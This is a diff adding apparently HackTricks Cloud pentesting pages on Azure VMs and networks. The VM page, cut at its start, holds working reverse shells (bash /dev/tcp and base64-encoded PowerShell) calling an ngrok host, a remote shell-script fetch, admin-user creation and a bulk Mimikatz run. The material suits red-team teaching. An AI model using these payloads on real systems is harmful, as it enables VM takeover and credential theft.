+  --protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Windows" %}
+* Execute a reverse shell
+
+{% code overflow="wrap" %}
+```bash
+# Get encoded reverse shell
+echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
+
+# Execute it
+az vm extension set \
+  --resource-group <rsc-group> \
+  --vm-name <vm-name> \
+  --name CustomScriptExtension \
+  --publisher Microsoft.Compute \
+  --version 1.10 \
+  --settings '{}' \
+  --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
+
+```
+{% endcode %}
+
+* Execute reverse shell from file
+
+{% code overflow="wrap" %}
+```bash
+az vm extension set \
+  --resource-group <rsc-group> \
+  --vm-name <vm-name> \
+  --name CustomScriptExtension \
+  --publisher Microsoft.Compute \
+  --version 1.10 \
+  --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
+  --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
+```
+{% endcode %}
+
+You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
+
+* Reset password using the VMAccess extension
+
+{% code overflow="wrap" %}
+```powershell
+# Run VMAccess extension to reset the password
+$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
+Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+### Relevant VM extensions
+
+The required permission is still **`Microsoft.Compute/virtualMachines/extensions/write`**.
+
+<details>
+
+<summary>VMAccess extension</summary>
+
+This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs.
+
+{% code overflow="wrap" %}
+```powershell
+# Run VMAccess extension to reset the password
+$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
+Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
+```
+{% endcode %}
+
+</details>
+
+<details>
+
+<summary>DesiredConfigurationState (DSC)</summary>
+
+This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension:
+
+```powershell
+# Content of revShell.ps1
+Configuration RevShellConfig {
+    Node localhost {
+        Script ReverseShell {
+            GetScript = { @{} }
+            SetScript = {
+                $client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port);
+                $stream = $client.GetStream();
+                [byte[]]$bytes = 0..65535|%{0};
+                while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
+                    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
+                    $sendback = (iex $data 2>&1 | Out-String );
+                    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
+                    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
+                    $stream.Write($sendbyte, 0, $sendbyte.Length)
+                }
+                $client.Close()
+            }
+            TestScript = { return $false }
+        }
+    }
+}
+RevShellConfig -OutputPath .\Output
+
+# Upload config to blob
+$resourceGroup = 'dscVmDemo'
+$storageName = 'demostorage'
+Publish-AzVMDscConfiguration `
+    -ConfigurationPath .\revShell.ps1 `
+    -ResourceGroupName $resourceGroup `
+    -StorageAccountName $storageName `
+    -Force
+
+# Apply DSC to VM and execute rev shell
+$vmName = 'myVM'
+Set-AzVMDscExtension `
+    -Version '2.76' `
+    -ResourceGroupName $resourceGroup `
+    -VMName $vmName `
+    -ArchiveStorageAccountName $storageName `
+    -ArchiveBlobName 'revShell.ps1.zip' `
+    -AutoUpdate `
+    -ConfigurationName 'RevShellConfig'
+```
+
+</details>
+
+<details>
+
+<summary>Hybrid Runbook Worker</summary>
+
+This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-automation-account/).
+
+</details>
+
+### VM Applications
+
+These are packages with all the **application data and install and uninstall scripts** that can be used to easily add and remove application in VMs.
+
+{% code overflow="wrap" %}
+```bash
+# List all galleries in resource group
+az sig list --resource-group <res-group> --output table
+
+# List all apps in a fallery
+az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
+```
+{% endcode %}
+
+These are the paths were the applications get downloaded inside the file system:
+
+* Linux: `/var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux/<appname>/<app version>`
+* Windows: `C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\<appname>\<app version>`
+
+Check how to install new applications in [https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli](https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli)
+
+{% hint style="danger" %}
+It's possible to **share individual apps and galleries with other subscriptions or tenants**. Which is very interesting because it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants.
+{% endhint %}
+
+But there **isn't a "marketplace" for vm apps** like there is for extensions.
+
+The permissions required are:
+
+* `Microsoft.Compute/galleries/applications/write`
+* `Microsoft.Compute/galleries/applications/versions/write`
+* `Microsoft.Compute/virtualMachines/write`
+* `Microsoft.Network/networkInterfaces/join/action`
+* `Microsoft.Compute/disks/write`
+
+Exploitation example to execute arbitrary commands:
+
+{% tabs %}
+{% tab title="Linux" %}
+```bash
+# Create gallery (if the isn't any)
+az sig create --resource-group myResourceGroup \
+   --gallery-name myGallery --location "West US 2"
+
+# Create application container
+az sig gallery-application create \
+    --application-name myReverseShellApp \
+    --gallery-name myGallery \
+    --resource-group <rsc-group> \
+    --os-type Linux \
+    --location "West US 2"
+
+# Create app version with the rev shell
+## In Package file link just add any link to a blobl storage file
+az sig gallery-application version create \
+   --version-name 1.0.2 \
+   --application-name myReverseShellApp \
+   --gallery-name myGallery \
+   --location "West US 2" \
+   --resource-group <rsc-group> \
+   --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
+   --install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
+   --remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
+   --update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"
+
+# Install the app in a VM to execute the rev shell
+## Use the ID given in the previous output
+az vm application set \
+   --resource-group <rsc-group> \
+   --name <vm-name> \
+   --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
+   --treat-deployment-as-failure true
+```
+{% endtab %}
+
+{% tab title="Windows" %}
+{% code overflow="wrap" %}
+```bash
+# Create gallery (if the isn't any)
+az sig create --resource-group <rsc-group> \
+   --gallery-name myGallery --location "West US 2"
+
+# Create application container
+az sig gallery-application create \
+    --application-name myReverseShellAppWin \
+    --gallery-name myGallery \
+    --resource-group <rsc-group> \
+    --os-type Windows \
+    --location "West US 2"
+
+# Get encoded reverse shell
+echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
+
+# Create app version with the rev shell
+## In Package file link just add any link to a blobl storage file
+export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
+az sig gallery-application version create \
+   --version-name 1.0.0 \
+   --application-name myReverseShellAppWin \
+   --gallery-name myGallery \
+   --location "West US 2" \
+   --resource-group <rsc-group> \
+   --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
+   --install-command "powershell.exe -EncodedCommand $encodedCommand" \
+   --remove-command "powershell.exe -EncodedCommand $encodedCommand" \
+   --update-command "powershell.exe -EncodedCommand $encodedCommand"
+
+# Install the app in a VM to execute the rev shell
+## Use the ID given in the previous output
+az vm application set \
+   --resource-group <rsc-group> \
+   --name deleteme-win4 \
+   --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
+   --treat-deployment-as-failure true
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+### User data
+
+This is **persistent data** that can be retrieved from the metadata endpoint at any time. Note in Azure user data is different from AWS and GCP because **if you place a script here it's not executed by default**.
+
+### Custom data
+
+It's possible to pass some data to the VM that will be stored in expected paths:
+
+* In **Windows** custom data is placed in `%SYSTEMDRIVE%\AzureData\CustomData.bin` as a binary file and it isn't processed.
+* In **Linux** it was stored in `/var/lib/waagent/ovf-env.xml` and now it's stored in `/var/lib/waagent/CustomData/ovf-env.xml`
+  * **Linux agent**: It doesn't process custom data by default, a custom image with the data enabled is needed
+  * **cloud-init:** By default it processes custom data and this data may be in [**several formats**](https://cloudinit.readthedocs.io/en/latest/explanation/format.html). It could execute a script easily sending just the script in the custom data.
+    * I tried that both Ubuntu and Debian execute the script you put here.
+    * It's also not needed to enable user data for this to be executed.
+
+```bash
+#!/bin/sh
+echo "Hello World" > /var/tmp/output.txt
+```
+
+### **Run Command**
+
+This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs**. The needed permission is `Microsoft.Compute/virtualMachines/runCommand/action`.
+
+{% tabs %}
+{% tab title="Linux" %}
+```bash
+# Execute rev shell
+az vm run-command invoke \
+  --resource-group <rsc-group> \
+  --name <vm-name> \
+  --command-id RunShellScript \
+  --scripts @revshell.sh
+
+# revshell.sh file content
+echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh
+```
+{% endtab %}
+
+{% tab title="Windows" %}
+{% code overflow="wrap" %}
+```bash
+# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
+# Execute a rev shell
+az vm run-command invoke \
+  --resource-group Research \
+  --name juastavm \
+  --command-id RunPowerShellScript \
+  --scripts @revshell.ps1
+
+## Get encoded reverse shell
+echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
+
+## Create app version with the rev shell
+## In Package file link just add any link to a blobl storage file
+export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
+
+# The content of 
+echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
+
+
+# Try to run in every machine
+Import-module MicroBurst.psm1
+Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+## Privilege Escalation
+
+{% content-ref url="../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md" %}
+[az-virtual-machines-and-network-privesc.md](../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md)
+{% endcontent-ref %}
+
+## Unauthenticated Access
+
+{% content-ref url="../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md" %}
+[az-vms-unath.md](../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../../az-post-exploitation/az-vms-and-network-post-exploitation.md" %}
+[az-vms-and-network-post-exploitation.md](../../az-post-exploitation/az-vms-and-network-post-exploitation.md)
+{% endcontent-ref %}
+
+## Persistence
+
+{% content-ref url="../../az-persistence/az-vms-persistence.md" %}
+[az-vms-persistence.md](../../az-persistence/az-vms-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/virtual-machines/overview](https://learn.microsoft.com/en-us/azure/virtual-machines/overview)
+* [https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/](https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/)
+* [https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md b/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
new file mode 100644
index 0000000000..daa687f26a
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
@@ -0,0 +1,319 @@
+# Az - Azure Network
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Azure provides **virtual networks (VNet)** that allows users to create **isolated** **networks** within the Azure cloud. Within these VNets, resources such as virtual machines, applications, databases... can be securely hosted and managed. The networking in Azure supports both the communication within the cloud (between Azure services) and the connection to external networks and the internet.\
+Moreover, it's possible to **connect** VNets with other VNets and with on-premise networks.
+
+## Virtual Network (VNET) & Subnets
+
+An Azure Virtual Network (VNet) is a representation of your own network in the cloud, providing **logical isolation** within the Azure environment dedicated to your subscription. VNets allow you to provision and manage virtual private networks (VPNs) in Azure, hosting resources like Virtual Machines (VMs), databases, and application services. They offer **full control over network settings**, including IP address ranges, subnet creation, route tables, and network gateways.
+
+**Subnets** are subdivisions within a VNet, defined by specific **IP address ranges**. By segmenting a VNet into multiple subnets, you can organize and secure resources according to your network architecture.\
+By default all subnets within the same Azure Virtual Network (VNet) **can communicate with each other** without any restrictions.
+
+**Example:**
+
+* `MyVNet` with an IP address range of 10.0.0.0/16.
+  * **Subnet-1:** 10.0.0.0/24 for web servers.
+  * **Subnet-2:** 10.0.1.0/24 for database servers.
+
+### Enumeration
+
+To list all the VNets and subnets in an Azure account, you can use the Azure Command-Line Interface (CLI). Here are the steps:
+
+{% code overflow="wrap" %}
+```bash
+# List VNets
+az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}"
+
+# List subnets of a VNet
+az network vnet subnet list --resource-group <ResourceGroupName> --vnet-name <VNetName> --query "[].{name:name, addressPrefix:addressPrefix}" -o table
+```
+{% endcode %}
+
+## Network Security Groups (NSG)
+
+A **Network Security Group (NSG)** filters network traffic both to and from Azure resources within an Azure Virtual Network (VNet). It houses a set of **security rules** that can indicate **which ports to open for inbound and outbound traffic** by source port, source IP, port destination and it's possible to assign a priority (the lower the priority number, the higher the priority).
+
+NSGs can be associated to **subnets and NICs.**
+
+**Rules example:**
+
+* An inbound rule allowing HTTP traffic (port 80) from any source to your web servers.
+* An outbound rule allowing only SQL traffic (port 1433) to a specific destination IP address range.
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# List NSGs
+az network nsg list --query "[].{name:name, location:location}" -o table
+az network nsg show --name <nsg-name>
+
+# Get NSG rules
+az network nsg rule list --nsg-name <NSGName> --resource-group <ResourceGroupName> --query "[].{name:name, priority:priority, direction:direction, access:access, protocol:protocol, sourceAddressPrefix:sourceAddressPrefix, destinationAddressPrefix:destinationAddressPrefix, sourcePortRange:sourcePortRange, destinationPortRange:destinationPortRange}" -o table
+
+# Get NICs and subnets using this NSG
+az network nsg show --name MyLowCostVM-nsg --resource-group Resource_Group_1 --query "{subnets: subnets, networkInterfaces: networkInterfaces}"
+```
+{% endcode %}
+
+## Azure Firewall
+
+Azure Firewall is a **managed network security service** in Azure that protects cloud resources by inspecting and controlling traffic. It is a **stateful firewall** that filters traffic based on rules for Layers 3 to 7, supporting communication both **within Azure** (east-west traffic) and **to/from external networks** (north-south traffic). Deployed at the **Virtual Network (VNet) level**, it provides centralized protection for all subnets in the VNet. Azure Firewall automatically scales to handle traffic demands and ensures high availability without requiring manual setup.
+
+It is available in three SKUs—**Basic**, **Standard**, and **Premium**, each tailored for specific customer needs:
+
+| **Recommended Use Case**       | Small/Medium Businesses (SMBs) with limited needs | General enterprise use, Layer 3–7 filtering | Highly sensitive environments (e.g., payment processing)  |
+| ------------------------------ | ------------------------------------------------- | ------------------------------------------- | --------------------------------------------------------- |
+| **Performance**                | Up to 250 Mbps throughput                         | Up to 30 Gbps throughput                    | Up to 100 Gbps throughput                                 |
+| **Threat Intelligence**        | Alerts only                                       | Alerts and blocking (malicious IPs/domains) | Alerts and blocking (advanced threat intelligence)        |
+| **L3–L7 Filtering**            | Basic filtering                                   | Stateful filtering across protocols         | Stateful filtering with advanced inspection               |
+| **Advanced Threat Protection** | Not available                                     | Threat intelligence-based filtering         | Includes Intrusion Detection and Prevention System (IDPS) |
+| **TLS Inspection**             | Not available                                     | Not available                               | Supports inbound/outbound TLS termination                 |
+| **Availability**               | Fixed backend (2 VMs)                             | Autoscaling                                 | Autoscaling                                               |
+| **Ease of Management**         | Basic controls                                    | Managed via Firewall Manager                | Managed via Firewall Manager                              |
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# List Azure Firewalls
+az network firewall list --query "[].{name:name, location:location, subnet:subnet, publicIp:publicIp}" -o table
+
+# Get network rules of a firewall
+az network firewall network-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table
+
+# Get application rules of a firewall
+az network firewall application-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table
+
+# Get nat rules of a firewall
+az network firewall nat-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table
+```
+{% endcode %}
+
+## Azure Route Tables
+
+Azure **Route Tables** are used to control the routing of network traffic within a  subnet. They define rules that specify how packets should be forwarded, either to Azure resources, the internet, or a specific next hop like a Virtual Appliance or Azure Firewall. You can associate a route table with a **subnet**, and all resources within that subnet will follow the routes in the table.
+
+**Example:** If a subnet hosts resources that need to route outbound traffic through a Network Virtual Appliance (NVA) for inspection, you can create a **route** in a route table to redirect all traffic (e.g., `0.0.0.0/0`) to the NVA's private IP address as the next hop.
+
+### **Enumeration**
+
+{% code overflow="wrap" %}
+```bash
+# List Route Tables
+az network route-table list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
+
+# List routes for a table
+az network route-table route list --route-table-name <RouteTableName> --resource-group <ResourceGroupName> --query "[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}" -o table
+```
+{% endcode %}
+
